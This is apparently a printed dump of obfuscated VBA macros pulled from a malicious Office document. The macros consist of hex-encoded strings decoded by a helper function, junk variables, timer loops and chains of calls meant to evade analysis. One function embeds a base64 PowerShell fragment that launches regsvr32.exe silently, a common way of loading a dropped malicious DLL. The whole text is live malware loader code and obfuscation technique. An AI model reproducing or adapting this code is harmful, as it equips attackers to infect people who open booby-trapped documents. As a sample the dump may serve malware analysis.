CKwCVTDE = "6e6" & "a" & "625" & "6556" & "26" & "d" & "6a4" & "6" & "694" & "7525" & "56" & "8" & "" & "4451" & "414" & "b58" & "6" & "271"
CHRXvsDGkSZD = Mid$(wCbTpVrwnFiB, YoypIrnPfjMW, 2)
Dim AeKho As String
AeKho = fxwD("37") & fxwD("33366434") & fxwD("33") & fxwD("343334") & fxwD("653463") & fxwD("35") & fxwD("38")
xEJNmyXgHcsD = xEJNmyXgHcsD & Chr(Val(fxwD("2648") & CHRXvsDGkSZD))
Dim KWRuadVUrLrVWaQSWS As String
KWRuadVUrLrVWaQSWS = fxwD("373534") & fxwD("343435353035") & fxwD("3836") & fxwD("653738") & fxwD("3736") & fxwD("343936") & fxwD("333535") & fxwD("34") & fxwD("3937303438")
Next
Dim fWaVMfSXutZpTewBo As String
fWaVMfSXutZpTewBo = fxwD("3533") & fxwD("36643435373835") & fxwD("34373537") & fxwD("32353836663536") & fxwD("36373663363835343663343434313732") & fxwD("3561343334643438373937") & fxwD("303532373637393466") & fxwD("36") & fxwD("653639") & fxwD("37") & fxwD("32366234") & fxwD("663638") & fxwD("3631")
AHPG = xEJNmyXgHcsD
Dim KvJovmGGQS As String
KvJovmGGQS = "50545" & "24" & "" & "e5063" & "577" & "6" & "714" & "566" & "764" & "b5a" & "4e" & "48" & "5a6a636f51" & "4" & "b4d" & "51" & "62" & "554" & "" & "e5944" & "6a6" & "86a" & "7" & "27345" & "4e6" & "c" & "4267" & "51" & "585" & "051796" & "c" & "50"
End Function
Sub RPPWYRt(Rolcj)
Dim dyuUJjf
Dim bBooYywIAr As Integer
bBooYywIAr = 29150
Dim hGOaP As Boolean
hGOaP = True
Dim DWGRla As Integer
DWGRla = 3523
dyuUJjf = 0
Dim RbkqIEsRf
Dim TUCcQtOTUJ As String
TUCcQtOTUJ = "4e" & "716c625" & "470" & "4774536655" & "50" & "" & "7a584c"
vRDgT (fxwD("516b41") & fxwD("76444c6c486a") & fxwD("56476c6876494e55") & fxwD("6453") & fxwD("4d45475a49787874") & fxwD("7966") & fxwD("4145"))
RbkqIEsRf = Timer
Do While Timer - RbkqIEsRf < dyuUJjf
Loop
End Sub
Sub UXvruhtpFCWiDjKlcXFL(mhvBSDu)
Dim iOifdhyYG
Dim BVWDsjvTixmcEO As String
BVWDsjvTixmcEO = "5" & "378" & "6c4" & "" & "b7078" & "455" & "2" & "4b616" & "e56" & "7576" & "4" & "1" & "6" & "f42" & "79" & "41" & "53" & "49"
Dim alAqyLLuzj As Integer
alAqyLLuzj = 4380
iOifdhyYG = 0
Dim rnAhNcNJj
Dim eejnmosSHLYHKlCdMLNVkb As String
eejnmosSHLYHKlCdMLNVkb = "4264476e75736a47" & "61524" & "d" & "6b7442" & "" & "537a" & "5a486e646" & "27442"
RPPWYRt (fxwD("4d58706a576c727255") & fxwD("474d6b") & fxwD("64") & fxwD("4f446451") & fxwD("4542"))
rnAhNcNJj = Timer
Do While Timer - rnAhNcNJj < iOifdhyYG
Loop
End Sub
Function BtcXqx(PRULDyiGxFFg As Variant) As Variant
Dim KjFaAeCFurXXDRmi As String
KjFaAeCFurXXDRmi = fxwD("373435333661343634623434") & fxwD("346134313536346437") & fxwD("61366135613437") & fxwD("35") & fxwD("313436") & fxwD("343537") & fxwD("33") & fxwD("3532366335") & fxwD("613538366537") & fxwD("35343436323639373636333561343536") & fxwD("3136") & fxwD("653462") & fxwD("36") & fxwD("32346535") & fxwD("33")
Dim meYXNjqKniSs As Long
Dim PFgtxhAYz As String
PFgtxhAYz = fxwD("363634") & fxwD("62373834") & fxwD("38353334") & fxwD("39") & fxwD("373437313737343436") & fxwD("6134353736") & fxwD("35303638") & fxwD("3462373334393633366234393737373337613731") & fxwD("3666") & fxwD("36") & fxwD("393634")
Dim nCBOTdWqaqpM As Variant
Dim kFDfbXSTuCHX As String
kFDfbXSTuCHX = "" & "5a4a" & "74" & "7964" & "4" & "e"
Dim sYJvFItxSvZy As String
Dim RICMdSbNvrQZ As String
RICMdSbNvrQZ = fxwD("34343535") & fxwD("373534663639346436383435353734643439343136613434") & fxwD("343934") & fxwD("39") & fxwD("366637313535") & fxwD("343234") & fxwD("64363236383635") & fxwD("36") & fxwD("613466343236") & fxwD("39343536653732366435363433") & fxwD("3431") & fxwD("34313733") & fxwD("363636") & fxwD("65346636633639") & fxwD("37343561")
For meYXNjqKniSs = 1 To Len(PRULDyiGxFFg) Step 2
Dim dTtrmzhutYppR As String
dTtrmzhutYppR = "6c4" & "84a" & "71" & "62" & "45" & "4" & "f4a" & "67" & "6" & "" & "a4353" & "4" & "7" & "544d5" & "4" & "476" & "4"
sYJvFItxSvZy = Mid$(PRULDyiGxFFg, meYXNjqKniSs, 2)
Dim MDVAHwjYCKBUCFVz As String
MDVAHwjYCKBUCFVz = "4f4" & "1674a6" & "8556f416f44" & "454b51596" & "750" & "" & "65564" & "b6" & "858"
nCBOTdWqaqpM = nCBOTdWqaqpM & Chr(Val(fxwD("2648") & sYJvFItxSvZy))
Dim dRqHnmdMpdJD As String
dRqHnmdMpdJD = "625" & "7547" & "2524849" & "" & "5265" & "47436b4972734f7" & "25667" & "4" & "b4674" & "714" & "57" & "a5745" & "756848426f5859" & "47656a67" & "525" & "5"
Next
Dim KDjDdFHEwunULbeS As String
KDjDdFHEwunULbeS = fxwD("3437346135") & fxwD("36") & fxwD("3463346434") & fxwD("3735373539366134653535366437383638373735") & fxwD("34") & fxwD("353137") & fxwD("303661") & fxwD("3432")
BtcXqx = nCBOTdWqaqpM
Dim ehfii As String
ehfii = fxwD("3638373137333730356134373634343636") & fxwD("653434353437") & fxwD("30373334363633346634363536373135393536373735353462") & fxwD("36663465") & fxwD("37353561353834643730376134643634353934") & fxwD("383665") & fxwD("346536") & fxwD("32356134") & fxwD("323735")
End Function
Sub wOdJApQarbIAcfFIjw(TeDmhL)
Dim oDrHaM As Double
Dim WvdkaweOdOskFbQJt As Boolean
WvdkaweOdOskFbQJt = True
Dim Bjmwk As Boolean
Bjmwk = False
Dim ZOhjs As Boolean
ZOhjs = IsNull(Bjmwk)
Dim VoNUHDG As Double
oDrHaM = 6
Dim txiplXKe As String
txiplXKe = fxwD("36343634343334613531363936663431353435") & fxwD("373434343336613733") & fxwD("3537") & fxwD("363634") & fxwD("31363435393531366135") & fxwD("32373934") & fxwD("34373037363561353336") & fxwD("3236363664343736") & fxwD("3435383730363936613438346234") & fxwD("3334") & fxwD("3136323463") & fxwD("363236") & fxwD("353439")
Dim oIGObonKY As String
oIGObonKY = "6665514a6f" & "4c" & "455a52424" & "47" & "66b4f65556b58534f65617a736c" & "6270705973514d" & "" & "4869" & "" & "41627" & "276" & "46686c507" & "64" & "a46"
Dim CDybMKvbqplmXbWFlkkLFcLpI As Long
CDybMKvbqplmXbWFlkkLFcLpI = 328600961
VoNUHDG = Application.InchesToPoints(oDrHaM)
Debug.Print VoNUHDG
UXvruhtpFCWiDjKlcXFL ("usamiYM" & "YI" & "" & "hvAv" & "j" & "aQLxPsR" & "LJB")
End Sub
Sub ZmgpoEdEAtvfy(fViJTiC)
Dim ZUckGRbMJ As Double
Dim DiReTUaU As Long
DiReTUaU = 507829255
Dim QvhQaDbSpUKFIZpehAfyQziB As String
QvhQaDbSpUKFIZpehAfyQziB = fxwD("35") & fxwD("3334363633343337") & fxwD("393538353334") & fxwD("3537343661343334393739353636323462373534393635363336") & fxwD("36") & fxwD("35") & fxwD("3534343664") & fxwD("353134") & fxwD("3934") & fxwD("623464")
Dim qEIcGIEZ As Long
qEIcGIEZ = 627243864
Dim PHfPcIDF As Double
ZUckGRbMJ = 22
Dim XKYxbIsEk As Integer
XKYxbIsEk = 15836
Dim LLRNNtqMlzPaJQiNvmFt As String
LLRNNtqMlzPaJQiNvmFt = fxwD("3532") & fxwD("3661376134") & fxwD("37346636") & fxwD("32") & fxwD("343135") & fxwD("37") & fxwD("36653730373934") & fxwD("32") & fxwD("34393561") & fxwD("36") & fxwD("3335") & fxwD("35")
PHfPcIDF = Application.InchesToPoints(ZUckGRbMJ)
Debug.Print PHfPcIDF
wOdJApQarbIAcfFIjw (fxwD("78466f704562706950") & fxwD("4f775858") & fxwD("6762") & fxwD("454e"))
End Sub
Sub yoZAoJy(OZluqh)
Dim MZHybHz As Double
Dim QzXPnVNH As Double
MZHybHz = 649
Dim iClyaFZiqt As Integer
iClyaFZiqt = 5627
Dim vPrcLKLumkLwKsTnqqNy As Long
vPrcLKLumkLwKsTnqqNy = 526474915
QzXPnVNH = MZHybHz / Application.InchesToPoints(1)
Debug.Print QzXPnVNH
ZmgpoEdEAtvfy (fxwD("5867") & fxwD("4370726d43") & fxwD("4862") & fxwD("476a4b") & fxwD("6f") & fxwD("624863"))
End Sub
Function cIKgjL(BdjgoqQBJiAn As Variant) As Variant
Dim QgcpXQiJlVlygPXiQn As String
QgcpXQiJlVlygPXiQn = fxwD("3639") & fxwD("373535353664353436") & fxwD("3137303664376135333631") & fxwD("3532363935") & fxwD("3134") & fxwD("3734663661343337343438") & fxwD("36") & fxwD("383465")
Dim DzYJXOVNlGEY As Long
Dim WfkPfoOoqSzJ As String
WfkPfoOoqSzJ = "43504467" & "714f" & "4969746b5" & "6526e4947426d" & "4c616453" & "73" & "" & "6f42"
Dim JgEMeoJdqQOy As Variant
Dim HNtqKPPPaLYEkweWD As String
HNtqKPPPaLYEkweWD = "4357506b56" & "6" & "76" & "" & "d427" & "3426c785" & "a" & "4b7" & "a6d79" & "4f4a7" & "066"
Dim sADfhIzFCrUw As String
Dim RAVIohHnqQNP As String
RAVIohHnqQNP = "7" & "379664962" & "5563747" & "7" & "46" & "444" & "5445178526a55" & "" & "657049" & "41714" & "f514870" & "6" & "c4347" & "66" & "59506e6d77" & "5a6c7" & "2" & "5a"
For DzYJXOVNlGEY = 1 To Len(BdjgoqQBJiAn) Step 2
Dim WzcrXmXtQdPUBjY As String
WzcrXmXtQdPUBjY = "614c656b" & "53" & "6b43737a4b62595944" & "746d667" & "86f77714e" & "664" & "f435" & "25a" & "73464d77696" & "b774548" & "" & "6e6d5" & "1" & "4e4e784" & "c"
sADfhIzFCrUw = Mid$(BdjgoqQBJiAn, DzYJXOVNlGEY, 2)
Dim FdcZSyEExMPUAQYUAP As String
FdcZSyEExMPUAQYUAP = fxwD("34623631353234373465346337") & fxwD("3536") & fxwD("6135383464") & fxwD("37363536") & fxwD("36343461343534363461363836613635") & fxwD("376135") & fxwD("363530") & fxwD("346136") & fxwD("343432") & fxwD("3731") & fxwD("343536333561373934") & fxwD("6536") & fxwD("33") & fxwD("34663731")
JgEMeoJdqQOy = JgEMeoJdqQOy & Chr(Val(fxwD("2648") & sADfhIzFCrUw))
Dim PmVlbGGu As String
PmVlbGGu = "536f68" & "675a7a" & "4454784c4c42" & "4d75" & "457552624f" & "44474c46" & "5561755" & "061" & "564f677a6a665a53784c61" & "74" & "4" & "968" & "" & "455271" & "44"
Next
Dim ucJtMBG As String
ucJtMBG = fxwD("343634393535366436613433") & fxwD("34343736366334") & fxwD("383664373236353634346637") & fxwD("39346236643661373535333739353535343530346536313533343735303637343737353634353337323639363536313661373137") & fxwD("39") & fxwD("346437") & fxwD("38") & fxwD("35") & fxwD("3835") & fxwD("313738")
cIKgjL = JgEMeoJdqQOy
Dim KmZVhbSgQPAEljUVJw As String
KmZVhbSgQPAEljUVJw = "4c666" & "c" & "466d" & "71" & "4e5" & "844" & "51706" & "3" & "557a4" & "f" & "" & "64726d"
End Function
Sub lGBEWjQlXX(FgnfDLMkWoqpzGtPRiGMsJeWt)
Dim AolSEmoId As Double
Dim uqefvNWVvApXzETqJojlrTbbv As Boolean
uqefvNWVvApXzETqJojlrTbbv = IsNull("")
Dim XiYrxxDlCenDMxtBuARKkXM As Boolean
XiYrxxDlCenDMxtBuARKkXM = False
Dim ZkBBiHyHy As Double
AolSEmoId = 25
Dim YNLhxCFxrucxOJyUC As Integer
YNLhxCFxrucxOJyUC = 9075
Dim PEWYWoPFNBr As Integer
PEWYWoPFNBr = 7824
ZkBBiHyHy = Application.InchesToPoints(AolSEmoId)
Debug.Print ZkBBiHyHy
yoZAoJy (fxwD("76697950646b6b75437242726a514f4e") & fxwD("4463") & fxwD("436852") & fxwD("6646") & fxwD("686a78") & fxwD("457372"))
End Sub
Sub WPeGwT(EbYwLyBLWTeEGSlOcoA)
Dim aOVlbS As Long
Dim NcXoGnKtP As Variant
NcXoGnKtP = Array(fxwD("4e"), fxwD("41"), fxwD("65"), fxwD("67"), fxwD("78"), fxwD("56"), fxwD("54"), fxwD("70"), fxwD("77"), fxwD("53"), fxwD("6f"), fxwD("4a"), fxwD("6a"), fxwD("51"), fxwD("57"), fxwD("51"), fxwD("78"), fxwD("6a"), fxwD("6c"), fxwD("4f"), fxwD("49"), fxwD("64"), fxwD("62"), fxwD("63"), fxwD("62"))
Dim KzkQlbwSbtMQ As Integer
KzkQlbwSbtMQ = 22604
lGBEWjQlXX ("NdV" & "Q" & "" & "Fymc")
For aOVlbS = LBound(NcXoGnKtP) To UBound(NcXoGnKtP)
Debug.Print NcXoGnKtP(aOVlbS)
Next aOVlbS
Dim jWKwYtNOUcc As Long
jWKwYtNOUcc = 925829521
End Sub
Function mmrymZW(KTJLmreNLmky As Variant) As Variant
Dim fJDZhkPZGy As String
fJDZhkPZGy = fxwD("373636373738") & fxwD("353434393561") & fxwD("3637") & fxwD("37613536353337393462343434613736") & fxwD("3639") & fxwD("3431") & fxwD("3432363135") & fxwD("37") & fxwD("36") & fxwD("3836") & fxwD("62346636") & fxwD("65")
Dim wRKpbjHZplbQ As Long
Dim kfYyEIX As String
kfYyEIX = "5" & "0" & "4a6e6" & "d704e4568544d7" & "7426843656468666f" & "7650" & "5261" & "" & "54486" & "e7" & "9"
Dim EjVdvwigkPmB As Variant
Dim gfUhqPXzHnitNlDuV As String
gfUhqPXzHnitNlDuV = fxwD("343635") & fxwD("313735346136") & fxwD("6335343633") & fxwD("3531373935") & fxwD("3435") & fxwD("61") & fxwD("3530366434633734") & fxwD("34323437373735343431363736383661") & fxwD("36") & fxwD("34") & fxwD("366234333463") & fxwD("34") & fxwD("38") & fxwD("37323435") & fxwD("346436") & fxwD("35")
Dim QnRZMZUTNLel As String
Dim HeliLqPpVQC As String
HeliLqPpVQC = "677" & "053" & "6f4" & "b687054734a70434" & "d785a4" & "84456554" & "b49" & "5559564a" & "616b5544486d4" & "e775657744" & "c6" & "66c" & "" & "5970"
For wRKpbjHZplbQ = 1 To Len(KTJLmreNLmky) Step 2
Dim RbpUA As String
RbpUA = fxwD("37613561") & fxwD("366435") & fxwD("353734") & fxwD("37313635363336") & fxwD("3636") & fxwD("39346336643633") & fxwD("34") & fxwD("61")
QnRZMZUTNLel = Mid$(KTJLmreNLmky, wRKpbjHZplbQ, 2)
Dim DtMJiCoKY As String
DtMJiCoKY = fxwD("3637373036613666366637393463373534") & fxwD("62366637303734373634663731363237303632") & fxwD("36") & fxwD("66363237") & fxwD("3436") & fxwD("343661") & fxwD("34") & fxwD("663461356135373664353636653736363737333539373637") & fxwD("3136613431") & fxwD("353635613631") & fxwD("37303432346334643466") & fxwD("3632")
EjVdvwigkPmB = EjVdvwigkPmB & Chr(Val(fxwD("2648") & QnRZMZUTNLel))
Dim UwluwLMKj As String
UwluwLMKj = "7" & "96a" & "4c" & "435865415" & "8" & "" & "6e7a71" & "535" & "2" & "596e" & "636" & "c" & "6854766162" & "65" & "636" & "45" & "66" & "" & "b4549"
Next
Dim JqHqfnAujLQKwVwm As String
JqHqfnAujLQKwVwm = fxwD("3739353034363734353434363463366434633537343235333537373437") & fxwD("3436663538373434333531363834373662343135363730373834613634373434") & fxwD("3935") & fxwD("3936643536353637") & fxwD("32") & fxwD("363734") & fxwD("37") & fxwD("346635") & fxwD("343636") & fxwD("353837") & fxwD("303733")
mmrymZW = EjVdvwigkPmB
Dim zZPOukrRcNrB As String
zZPOukrRcNrB = fxwD("366237373631353034") & fxwD("643631") & fxwD("3539363334") & fxwD("38") & fxwD("3661346334") & fxwD("373531346535353738373737") & fxwD("6136") & fxwD("373665") & fxwD("37") & fxwD("343435")
End Function
Sub ysomKTjPAnCY(ThzLsKkLWnvwyBMXYmqeXL)
Dim SSreADRQ
Dim XFFKUQL As Long
XFFKUQL = 334702984
SSreADRQ = 0
Dim AlcWDbP
Dim LdOqDuYGvkyhWvDVuVsgu As Integer
LdOqDuYGvkyhWvDVuVsgu = 22258
WPeGwT (fxwD("4a") & fxwD("554c63566c62425379") & fxwD("46") & fxwD("734673") & fxwD("59436e55526e63454c") & fxwD("5867"))
AlcWDbP = Timer
Do While Timer - AlcWDbP < SSreADRQ
Loop
End Sub
Sub AYuWMzyELlJjneNoIULHRXlb(WfEzGmRBFz)
Dim UCYHfEsX As Double
Dim PVroHFvixMHEfXAItHoj As String
PVroHFvixMHEfXAItHoj = "5" & "3" & "634f4" & "85" & "56a43655" & "" & "0714" & "c"
Dim YQesoz As Integer
YQesoz = 26939
Dim XfOdSTFG As Double
UCYHfEsX = 25
Dim UlERKxXVzvf As Integer
UlERKxXVzvf = 27287
Dim FSyCLBBpxDirDqBcklFeWpe As String
FSyCLBBpxDirDqBcklFeWpe = fxwD("34633632") & fxwD("37") & fxwD("383466") & fxwD("3433") & fxwD("366635") & fxwD("3337313532") & fxwD("343937") & fxwD("383539") & fxwD("353636") & fxwD("333439363735") & fxwD("3237") & fxwD("37")
Dim OhFfqXaT As Boolean
OhFfqXaT = IsNull(FSyCLBBpxDirDqBcklFeWpe)
XfOdSTFG = Application.InchesToPoints(UCYHfEsX)
Debug.Print XfOdSTFG
ysomKTjPAnCY (fxwD("504f50") & fxwD("4d686b546c5949576a") & fxwD("4561") & fxwD("624d") & fxwD("584877") & fxwD("6c"))
End Sub
Sub aVTulBCdEkMlPWBIZjXMgKF(qvsQxbPzcMhpMobsrsIuX)
Dim LloXQBzn As Double
Dim wMggyUpoPRaILGcnqxS As Long
wMggyUpoPRaILGcnqxS = 196979663
Dim ZtjsolLYboxUmRMhMQekTyocC As Long
ZtjsolLYboxUmRMhMQekTyocC = 114646857
Dim ZsTkFDxWZBRIMrOAEGRIMJk As String
ZsTkFDxWZBRIMrOAEGRIMJk = fxwD("353036") & fxwD("6436") & fxwD("6335333638346637303631366636") & fxwD("39") & fxwD("343437") & fxwD("373631") & fxwD("37") & fxwD("3437") & fxwD("3435") & fxwD("343438363137313738") & fxwD("3632373736") & fxwD("62") & fxwD("363936") & fxwD("61") & fxwD("37363530") & fxwD("35393530") & fxwD("3434") & fxwD("3737")
Dim EDTTHoub As Double
LloXQBzn = 11
Dim VaJPFYQPsTPfVBYHCoGHmURIG As Long
VaJPFYQPsTPfVBYHCoGHmURIG = 764458886
EDTTHoub = Application.InchesToPoints(LloXQBzn)
Debug.Print EDTTHoub
AYuWMzyELlJjneNoIULHRXlb ("WZfwWLX" & "eUNgNZspwVps" & "fI" & "IRv" & "O" & "" & "OwKw")
End Sub
Function tAljN(dzDufCSuNPWC As Variant) As Variant
Dim iAVpgtQjTMcBVXk As String
iAVpgtQjTMcBVXk = fxwD("373536653532") & fxwD("34643432") & fxwD("373336") & fxwD("64366637343636") & fxwD("37383534") & fxwD("37") & fxwD("353539") & fxwD("3638") & fxwD("35393534") & fxwD("366634653639") & fxwD("353136") & fxwD("61363637") & fxwD("353433")
Dim WdEytVLYYjCr As Long
Dim UcaZFeBIUPNuuXKb As String
UcaZFeBIUPNuuXKb = fxwD("3738") & fxwD("35") & fxwD("3334373737") & fxwD("35") & fxwD("33") & fxwD("36") & fxwD("353466363737") & fxwD("31") & fxwD("373934") & fxwD("36353137") & fxwD("37") & fxwD("34") & fxwD("3537") & fxwD("383536")
Dim RAzvjRjwpBKc As Variant
Dim vDRNsjOr As String
vDRNsjOr = fxwD("3531353337") & fxwD("3936373530373137") & fxwD("37") & fxwD("343837") & fxwD("3734653738373035303639363536343539373034633731373336343664") & fxwD("3761353836633461376135333666353134") & fxwD("3334333761373035303464") & fxwD("3661363536643761") & fxwD("3666") & fxwD("35") & fxwD("323739363736") & fxwD("33")
Dim SuKDMayXlqXz As String
Dim KusVHWn As String
KusVHWn = "5a" & "68" & "4548" & "74" & "594" & "c7" & "a4a4c" & "" & "614d66" & "" & "4352" & "7466" & "6f784" & "2"
For WdEytVLYYjCr = 1 To Len(dzDufCSuNPWC) Step 2
Dim DDbzMSObOHDQvDCz As String
DDbzMSObOHDQvDCz = fxwD("3461") & fxwD("3738") & fxwD("3439363537") & fxwD("313636") & fxwD("37") & fxwD("383536") & fxwD("3638") & fxwD("3561") & fxwD("353934") & fxwD("38") & fxwD("3734") & fxwD("3537")
SuKDMayXlqXz = Mid$(dzDufCSuNPWC, WdEytVLYYjCr, 2)
Dim EjyNIfJMkTeryUbV As String
EjyNIfJMkTeryUbV = "58687" & "a7a6463634651745057534" & "84e476f524e6" & "a6c534b57585" & "7" & "72" & "73644950" & "4" & "b6b73454" & "3" & "" & "5472"
RAzvjRjwpBKc = RAzvjRjwpBKc & Chr(Val(fxwD("2648") & SuKDMayXlqXz))
Dim kAXyZZRBApIdd As String
kAXyZZRBApIdd = fxwD("363137") & fxwD("3937") & fxwD("36") & fxwD("346535") & fxwD("3734") & fxwD("363733") & fxwD("373236") & fxwD("323433") & fxwD("343536653736") & fxwD("3561") & fxwD("35") & fxwD("33") & fxwD("353636313537") & fxwD("353134") & fxwD("333662") & fxwD("3738")
Next
Dim pduKGEhQFaDCsgfVq As String
pduKGEhQFaDCsgfVq = "6" & "34346" & "774b70" & "624" & "577" & "" & "5854" & "537571" & "6f664a72" & "636" & "b7" & "758" & "72" & "6" & "5744" & "3"
tAljN = RAzvjRjwpBKc
Dim sFiRTSnHaO As String
sFiRTSnHaO = fxwD("356134643438353734353637") & fxwD("353234643534366435373732373737343466") & fxwD("3731363337") & fxwD("3234393636366135303633363134323461353636313634343535") & fxwD("373761") & fxwD("34393736346134653539") & fxwD("3736") & fxwD("363737") & fxwD("32") & fxwD("36393539") & fxwD("3737") & fxwD("35363731346636") & fxwD("62")
End Function

Function fxwD(duvAMKnSs As Variant) As Variant
Dim xONuhVRNN As String
xONuhVRNN = "434c7548506c657a75" & "57725066586664414d" & "7a4f6c70446e6f5967" & "576f52494a59666744" & "497a66"
Dim AgimndJcb As Long
Dim tHppuLCIsWmanW As String
tHppuLCIsWmanW = "4c59724d4a5045734c70" & "734f"
Dim XrqlOVrK As Variant
Dim SavGepzQ As String
SavGepzQ = "5551684d6" & "1"
Dim LIsCxskKTu As String
Dim KQFrHhNhfYzUSmtTtw As String
KQFrHhNhfYzUSmtTtw = "70586c6c7174555864596b6854764b5947504d465a477" _
& "a"
For AgimndJcb = 1 To Len(duvAMKnSs) Step 2
Dim jriVJzC As String
jriVJzC = "574f6f5946705a497" & "96b50554a59636d68" & "54466e7149425a4f6" & "d72454948656d4c69" & "6b46474a6d62"
  LIsCxskKTu = Mid$(duvAMKnSs, AgimndJcb, 2)
Dim UlhfPcdHgOm As String
UlhfPcdHgOm = "58705165" & "42465967" & "4a735963" & "687a6546" & "65"
  XrqlOVrK = XrqlOVrK & Chr(Val("&H" & LIsCxskKTu))
Dim wYjaefwlfXnHVEFbW As String
wYjaefwlfXnHVEFbW = "4556624e75524f4a4a52795442415a744d" _
& "76724a4e414d424b72434364"
Next
Dim NUraapqUMniUNSRBsWOz As String
NUraapqUMniUNSRBsWOz = "70574a427059785" & "071756c42744b75" & "584d"
fxwD = XrqlOVrK
Dim BvaKukfaVoHJQrIdRa As String
BvaKukfaVoHJQrIdRa = "686f464c696e6f416d5a7357" _
& "5449614b496c54487065"
End Function

Macro #8: mEZeiqsTJKYK7Ao
»
Attribute VB_Name = "mEZeiqsTJKYK7Ao"
Sub ZBtiLRqKPv(SJHPQWFzhjQnQn)
Dim FZINOV As Double
Dim bmuAvplKu As Double
FZINOV = 1891
Dim zhqKrI As Boolean
zhqKrI = IsNull("")
bmuAvplKu = FZINOV / Application.InchesToPoints(1)
Debug.Print bmuAvplKu
AtAaFlUUzgErwOS
End Sub
Sub wbwjMOG(BPVHKNMobitepezZkVgkpL)
Dim TYReCpUfC
Dim JySCJiLWFRTT As Long
JySCJiLWFRTT = 45270556
TYReCpUfC = 0
Dim QgfWqRgHG
Dim OlXcBKajPFz As Long
OlXcBKajPFz = 701327597
Dim YQSsqJfszSiwrGzftn As Long
YQSsqJfszSiwrGzftn = 550831255
Dim XsmsUJTVfmShwPUrKls As Integer
XsmsUJTVfmShwPUrKls = 277
ZBtiLRqKPv ("IirjaHcKz")
QgfWqRgHG = Timer
Do While Timer - QgfWqRgHG < TYReCpUfC
Loop
End Sub
Function QznRxNYErOr(qzGTTixpnpQrjVam As String)
Dim ZCUrNfmaimGImpiJNNarD As Integer
ZCUrNfmaimGImpiJNNarD = 5707
Dim AuwFsXmNGuhdTBSuBhOYihzf As Long
AuwFsXmNGuhdTBSuBhOYihzf = 305925094
Dim VigrwdZPwYNGrUR As Integer
VigrwdZPwYNGrUR = 24440
qzGTTixpnpQrjVam = "MAMwA3ADMAMQA2ACkAIAB7AAoAJABiAGQAYgBuAHcAagBhAHQAdgB4AHYAdAB2AHQAcwA9ACIAbgByAGEAZQB2AHUAagBjAGQAaABlAGsAYwB1AHAAagAiADsACgAkAGIAbQB6AHkAdQByAHkAIAA9ACAAJAB3AGkAawBxAHUAZwBnADsACgAkAHIAeABsAGEAdgBiAHEAbQBuAGgAcwB5AD0AIgBkAHQAcgBjAGgAcwBqACIAOwAKACQAcwBqAHcAdwB5ACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAcgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIgAgAC0AQQByAGcAcwAgACIALwBzACAAJAByAGcAZAB"
Dim HCQZO As Boolean
HCQZO = True
QznRxNYErOr = qzGTTixpnpQrjVam
Dim hkrhCGTSxO
Dim qLaamixbWsajuxxBcqUVjLdr
hkrhCGTSxO = "ANBNoOeOsWWPVGtPQpm"
Dim YesLC
YesLC = "lvqGCgdpLXluOFqpMuNAikAsWEpPSsHueZeGPZPvfDGVUWBpZCVfiTHKkSaOUQLeiCdLGfIfEgwrGJoXPyfEbSUdPEXodtGWokEUqfANwwIoUNZvhrsqQlqwIlcCGRCKTpEyQBSRZEUGIETFnoHpQAbVmdTjTsrEEfCmGaAtVmXFMZqjqWWQrCOZJmJnHAjWMQCqnWiqLXFYneuwfxFNhoGrAVTyliAGteMObatUmzHlJzBgkpHFtXAlqHJIURvLykwuDkYPnOiWtaSmtffskQmBfpfJVuQpqsVvBohUNDFEnuWHepxCcstlbeLVFyeHRYCxcDtLliQeSmQIFcBaPaDS"
qLaamixbWsajuxxBcqUVjLdr = "oklMzuIDrkbiTZdJEMbWFKNSOaVcBChvUsavaaEXXKMzkeVBImggXrgkgXhQUdvxNcixbDTbFBmSfXqxBYcXJgLEYxHAfJfhJcGIgczWAzLZhiXgyzUbjsUeMANMVyCAaHzBxJbSAoShOFniVmQoZMfIXavisThAlikSatsfrCWeFLlQKPyCxUIwCIWOUZBiPcoqsXAqQuJeValAzwQEOrYqOuBxAjVFkLwPbGOEsaXPJMxRwQYhuyAogMaxskZdQuifhTaiTMOXZSaOdTippFiCmydGkeIjsDtWHwpFOCjRbgYiYfxxSavnunQaOaCLpToORxpUaTdBdvbclIMFQIIOvmNxhKvmBfdZDYAkktmcItzQEgrUARVUIFpkIIXJHDtPTSS"
If Len(qLaamixbWsajuxxBcqUVjLdr) = 0 Then
hkrhCGTSxO = hkrhCGTSxO + "ISnjkVHieggLfLexoJWDQNSbuHbfOrCuHsAAbfTemOBtOIgSggZBbUMtpWXvwQwEzllBwKduxnbPEVjHolakxWxRnxWoVvaFVulKOlkVbVjCMKpuTZcNOKaGFqQisaApciCJXIbIPp"
Else
Do Until Len(YesLC) = 0
YesLC = Left(YesLC, Len(YesLC) - 1)
Loop
End If
End Function
Macro #9: mvqMKPXehZLKnPi6e
»
Attribute VB_Name = "mvqMKPXehZLKnPi6e"
Sub qLOPGIfLL(qEVEaqfR)
Dim GVXhTi As Long
Dim HydVwKR As Variant
HydVwKR = Array("J", "Q", "k", "k", "a", "P", "v", "r", "B", "g", "I", "Z", "i", "q", "V", "Y", "Z", "g", "c", "Y", "w", "j", "w", "B", "t", "D", "u", "X", "L", "x", "k", "g", "i", "d", "s", "U", "f", "X", "v")
Dim jNdRalyXXmhRwViLb As String
jNdRalyXXmhRwViLb = "446c75634d676d6e416d7" & "241486e6f7267506c6b48" & "61595976"
Dim TSSgZDdtcKZD As String
TSSgZDdtcKZD = "416e5166537774636566696b4172736552487842494b4" & "a72495767796654556e507a634e42585a"
Dim dxUSqcTkiWvgYkXiELCd As Integer
dxUSqcTkiWvgYkXiELCd = 24054
bjwPdZRBpBmzaezigNtJJIb
For GVXhTi = LBound(HydVwKR) To UBound(HydVwKR)
Debug.Print HydVwKR(GVXhTi)
Next GVXhTi
Dim uYsxbZhvmXGqgNYhJMRv As Long
uYsxbZhvmXGqgNYhJMRv = 151348393
End Sub
Sub LktVRAjqBFw(jOehsIOvFFoRvO)
Dim eiQZMch As Long
Dim tnMPYI As Variant
tnMPYI = Array("x", "w", "K", "M", "f", "f", "V", "T", "j", "i", "w", "K", "U", "E", "f", "n", "Z", "u", "P", "p", "s", "U", "o", "U", "V", "I", "J", "a", "c", "h", "M", "x", "M", "c", "R", "M", "w", "q")
Dim TQLIANDIrR As Long
TQLIANDIrR = 134340781
Dim EAkxUFrxNsnSikeRwneCKoGK As Long
EAkxUFrxNsnSikeRwneCKoGK = 903837340
Dim JzIZQtRen As Long
JzIZQtRen = 20697144
qLOPGIfLL ("ziidchopFYVHhbb")
